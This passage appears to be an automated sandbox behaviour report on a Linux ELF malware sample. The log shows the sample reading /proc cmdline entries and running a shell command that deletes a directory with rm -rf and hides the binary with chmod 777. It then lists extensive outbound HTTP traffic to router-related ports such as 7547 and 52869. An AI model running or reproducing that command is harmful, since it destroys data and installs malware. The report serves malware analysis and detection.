          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/256/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/257/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/378/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/3413/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/258/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/259/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/1475/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/936/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/30/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/816/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5433)Shell command executed: sh -c "rm -rf usr/bin && mkdir usr; >usr/bin && mv /tmp/AFWaD3vnqR.elf usr/bin; chmod 777 usr/bin"Jump to behavior
          Source: /bin/sh (PID: 5437)Chmod executable: /usr/bin/chmod -> chmod 777 usr/binJump to behavior
          Source: /bin/sh (PID: 5435)Mkdir executable: /usr/bin/mkdir -> mkdir usrJump to behavior
          Source: /bin/sh (PID: 5434)Rm executable: /usr/bin/rm -> rm -rf usr/binJump to behavior
          Source: /usr/bin/chmod (PID: 5437)File: /tmp/usr/bin (bits: - usr: rwx grp: rwx all: rwx)Jump to behavior
          Source: /bin/sh (PID: 5437)Chmod executable with 777: /usr/bin/chmod -> chmod 777 usr/binJump to behavior

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: unknownNetwork traffic detected: HTTP traffic on port 53724 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 44868 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 53724 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 53008 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 44868 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 53008 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 53724 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 41648 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 46136 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 58038 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 41648
          Source: unknownNetwork traffic detected: HTTP traffic on port 44868 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 46136 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 46182 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 56548 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 58602 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 46230 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 37664 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 42736 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 46248 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 50432 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 53326 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 41584 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 42746 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 37684 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 38120 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 41594 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 50454 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 44868 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 38120
          Source: unknownNetwork traffic detected: HTTP traffic on port 38128 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 50460 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 40112 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 56656 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 40154 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 48576 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 50298 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 48586 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 38128 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 50470 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 42416 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 48124 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 42470 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 48576 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 50788 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 48224 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 48586 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 56656 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 56656
          Source: unknownNetwork traffic detected: HTTP traffic on port 38128 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 50470 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 48576 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 48586 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 41620 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 56700 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 56700
          Source: unknownNetwork traffic detected: HTTP traffic on port 48708 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 48744 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 55218 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 41620 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 41696 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 56656
          Source: unknownNetwork traffic detected: HTTP traffic on port 38128 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 48576 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 41696 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 48586 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 44868 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 60580 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 43792 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 60580 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 52426 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 52426 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 52430 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 48576 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 45014 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 37978 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 48586 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 38128 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 52426 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 38262 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 41642 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 43792 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 42018 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 52430 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 37978 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 42050 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 52426 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 36182 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 45224 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 36220 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 45258 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 60650 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 60702 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 58004 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 35346 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 42050 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 45224 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 36220 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 45224
          Source: unknownNetwork traffic detected: HTTP traffic on port 45268 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 58348 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 48458 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 35146 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 45258 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 45280 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 58348
          Source: unknownNetwork traffic detected: HTTP traffic on port 58398 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 45268
          Source: unknownNetwork traffic detected: HTTP traffic on port 48508 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 35198 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 45280
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 58398
          Source: unknownNetwork traffic detected: HTTP traffic on port 35420 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 48508 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 41888 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 43792 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 48508 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 54612 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 48458 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 52430 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 44868 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 48508 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 52426 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 48576 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 47068 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 50894 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 51742 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 56824 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 48586 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 50894
          Source: unknownNetwork traffic detected: HTTP traffic on port 50908 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 50908
          Source: unknownNetwork traffic detected: HTTP traffic on port 51742 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 38128 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 56888 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 51742 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 48508 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 48458 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 56824 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 56888 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 51742 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 59554 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 43792 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 53520 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 59606 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 53542 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 53542 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 52430 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 58786 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 53542 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 58808 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 56888 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 59554 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 51742 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 52426 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 33276 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 48508 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 59606 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 44944 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 60538 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 46136 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 48458 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 54718 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 34996 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 59554 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 56784 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 60180 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 48586 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 48576 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 34034 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 39548 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 34034 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 56888 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 47596 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 47284 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 46112 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 56522 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 38404 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 47364 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 46196 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 58894 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 37918 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 39556 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 56544 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 34134 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 38426 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 38128 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 38064 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 50654 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 34162 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 38084 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 58922 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 40354 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 38092 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 34034 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 50654
          Source: unknownNetwork traffic detected: HTTP traffic on port 50694 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 34034
          Source: unknownNetwork traffic detected: HTTP traffic on port 58894 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 46196 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 50694
          Source: unknownNetwork traffic detected: HTTP traffic on port 51742 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 47364 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 38084 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 58922 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 40354 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 58894 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 47364 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 38084 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 58922 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 40354 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 44868 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 47670 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 57410 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 37918 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 40394 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 51066 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 47364 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 47284 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 57534 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 59298 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 57534 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 38084 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 59732 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 59756 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 51078 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 51066 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 51078
          Source: unknownNetwork traffic detected: HTTP traffic on port 59328 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 59554 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 48508 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 58282 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 43530 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 51066 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 47364 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 48708 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 59974 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 44230 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 57468 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 48708
          Source: unknownNetwork traffic detected: HTTP traffic on port 48740 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 48740
          Source: unknownNetwork traffic detected: HTTP traffic on port 57468 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 45742 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 43792 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 48668 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 41528 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 59934 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 46822 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 48788 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 46840 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 48668
          Source: unknownNetwork traffic detected: HTTP traffic on port 41654 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 60060 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 46840 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 60546 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 60016 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 38084 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 59974 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 37918 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 45858 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 48788 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 48788
          Source: unknownNetwork traffic detected: HTTP traffic on port 47284 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 60778 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 52430 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 35328 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 58196 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 46518 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 58490 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 45930 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 51066 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 46518
          Source: unknownNetwork traffic detected: HTTP traffic on port 46816 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 47060 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 50332 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 47070 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 50332
          Source: unknownNetwork traffic detected: HTTP traffic on port 50346 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 58490 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 35620 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 56496 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 35622 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 35632 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 46816 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 56518 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 45930 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 45942 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 50346 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 51492 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 46816
          Source: unknownNetwork traffic detected: HTTP traffic on port 51552 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 35072 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 45942
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 50346
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 46518
          Source: unknownNetwork traffic detected: HTTP traffic on port 35090 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 35620 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 45942
          Source: unknownNetwork traffic detected: HTTP traffic on port 37632 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 35632 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 45930 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 54016 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 54016 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 52426 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 35620 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 35632 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 54022 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 44252 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 45270 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 47364 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 42870 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 42870 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 50530 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 42238 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 45270 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 42870
          Source: unknownNetwork traffic detected: HTTP traffic on port 56658 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 33602 -> 1723
          Source: unknownNetwork traffic detected: HTTP traffic on port 48458 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 44446 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 35622 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 44446 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 53256 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 59166 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 35620 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 59816 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 38084 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 44330 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 45348 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 35632 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 51066 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 53256 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 37614 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 45812 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 37618 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 37614
          Source: unknownNetwork traffic detected: HTTP traffic on port 53906 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 58792 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 33408 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 56324 -> 55555
          Source: unknownNetwork traffic detected: HTTP traffic on port 44252 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 36246 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 59172 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 41062 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 33424 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 37614
          Source: unknownNetwork traffic detected: HTTP traffic on port 36264 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 46194 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 59172 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 37618 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 45816 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 41062 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 37618
          Source: unknownNetwork traffic detected: HTTP traffic on port 36284 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 36300 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 41080 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 59172 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 46208 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 37918 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 47284 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 58792 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 44330 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 59172 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 58892 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 56888 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 35620 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 35632 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 44252 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 51742 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 59172 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 58792 -> 52869
          Source: unknownNetwork traffic detected: HTTP traffic on port 44330 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 38858 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 44894 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 59224 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 41614 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 44894
          Source: unknownNetwork traffic detected: HTTP traffic on port 44900 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 59230 -> 7547
          Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 44900
